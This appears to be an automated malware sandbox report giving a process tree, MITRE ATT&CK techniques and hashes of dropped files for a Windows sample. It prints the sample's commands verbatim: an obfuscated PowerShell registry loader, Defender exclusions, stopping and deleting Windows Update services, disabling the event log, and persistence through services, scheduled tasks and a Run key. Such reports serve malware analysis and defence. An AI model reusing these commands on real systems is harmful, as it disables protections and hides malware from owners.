  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4468
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2096
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1568
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1356

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2792

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2876

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3372

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3504
- C:\Users\Admin\AppData\Local\Temp\3b1bf937711e0b1f3b6e455d535cc4f0.exe
  "C:\Users\Admin\AppData\Local\Temp\3b1bf937711e0b1f3b6e455d535cc4f0.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe
    "C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4424
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2456
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3180
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2384
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:864
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4036
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3188
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4516
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2576
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4948
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1480
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2924
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:368
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3576
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2260
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:3300
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1160
- - C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe
    "C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3480
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3864
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1172
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3672
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1820
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:3184
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2888
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:3616
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4620
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        
        PID:4864
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:2664
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:4860
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:3324
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1420
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4552
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1068
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4416
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:4520
- - C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe
    "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1976
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2184
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3608

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3860

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3728

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2692

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1244

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe d8cad50e3d0865302435857ca8e217bd GQxSpJDaOEK1n0T/9jXxyw.0.1.0.0.0
1⤵
PID:4544
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4272

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2612

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4920
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3840
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2952
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3440
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3652
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4720
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4944
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4864
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4584
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4856
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2732
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1816
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:908
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2412
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4760
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4812
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3436
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4364
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:872
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4604
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3116
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:1828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf410ee315c0699da2cefed02590229a

SHA1
b5f0bada1e3ff99067044a622b4a43e1fc825992

SHA256
b578105e2c2ce54c8aea280a580fc7637dde5607399109e0aa234f1bae9f6440

SHA512
a909de6ffad511c3fce2759917ea5b7047afbfae5a12afaedd3132ad8a7786085a029b56e399b6a832ec8325ddf42e3c2919cbdc44300b864d424b30ca2dec2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MLjvrefsd5vf1.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uqbi1t0c.ha1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Windows\Logs\CBS\CBS.log

Filesize
1KB

MD5
c363a55f3fc2e67317b35b1d338c7f98

SHA1
58e4b8e1524f3180a94ed44801fac465e959288d

SHA256
0ee0c5c48a371d08e64f9a247f8382d6da4822c61f55e056b25c2bc8106c3551

SHA512
cf819ef49de902c8fab95b95b6b891fad84c184a4d2a2c8c9b222ffb3b75147617c473abea5fa4f0b9ea0250f01920149bdb66a17f6e040902f6a42d54e7d15b

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
e8e812228c760e98e33648e83045309c

SHA1
dabe5ed0086ca7531378b2d15e894c181a0bbd0e

SHA256
16e951ca5d9f76f8e52fe3f61952af8ff1b187aea51f8d1e6ddeec54f5a00424

SHA512
f486847f43587beefa1faf85d309dec1e64fec648ad8dc63b2a1290d495e4fb8350dacdee8beda3cbc7969cfd96a6a61cdc5d409e553af515daf68af4f1cfc3a

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
806c24bccf5626e8f2f1c64424017b60

SHA1
608333a61f96e72d769f8ad54ca43801f6c24357

SHA256
c268a1622398cc42579484597552b6d15d15f6010d8998e6ee2a2a6b216d75fe

SHA512
ecd5891aada2e6e9c91105e7474cf219a52e33eee2f91eca39aa089474148ad06bb41452939eaa668d2c37e13bb6428725d9ab4fa1a2f2e1486e30c8d709f58f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
